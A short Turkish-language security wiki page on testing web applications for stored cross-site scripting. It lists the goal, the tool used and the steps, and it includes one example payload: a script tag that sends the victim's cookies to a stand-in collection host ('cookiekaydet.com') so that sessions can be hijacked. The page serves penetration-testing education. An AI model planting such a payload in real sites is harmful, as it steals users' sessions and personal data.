Depolanmış (Stored) XSS Testleri

BGA Security Wiki sitesinden
Şuraya atla: kullan, ara

Amaç:

Depolanmış XSS zafiyetinden faydalanılarak kullanıcıların tarayıcılarında hedef sistem üzerinden kod çalıştırmak.

Araçlar:

  • Firefox

Adımlar:

  • Hedef uygulamada girdi noktalarından girilen değerlerin daha sonra başka ekranda gösterilmek veya sayfanın bir yerinde kullanılmak amacıyla kaydedildiği durumlar aranır.
  • Örneğin uygulamanın kendi içindeki mesajlaşmasında gerekli arındırma (sanitizing) işlemleri yapılmadıysa bir kullanıcı başka bir kullanıcıya;
<script>document.location=”cookiekaydet.com/kaydet.php?val”=+document.cookie</script>

gibi zararlı kodlar içeren mesajlar gönderilerek kullanıcıların oturum bilgileri ele geçirilebilir veya kullanıcılar istemleri dışında başka sayfalara yönlendirilebilir. Hatta kullanıcıların tarayıcıları üzerinden kişisel bilgisayarlarına daha ileri saldırılar yapılabilir.

Kaynak:

  • XSS Attacks - Cross Site Scripting Exploits & Defense
"https://wiki.bgasecurity.com/index.php?title=Depolanmış_(Stored)_XSS_Testleri&oldid=587" adresinden alındı.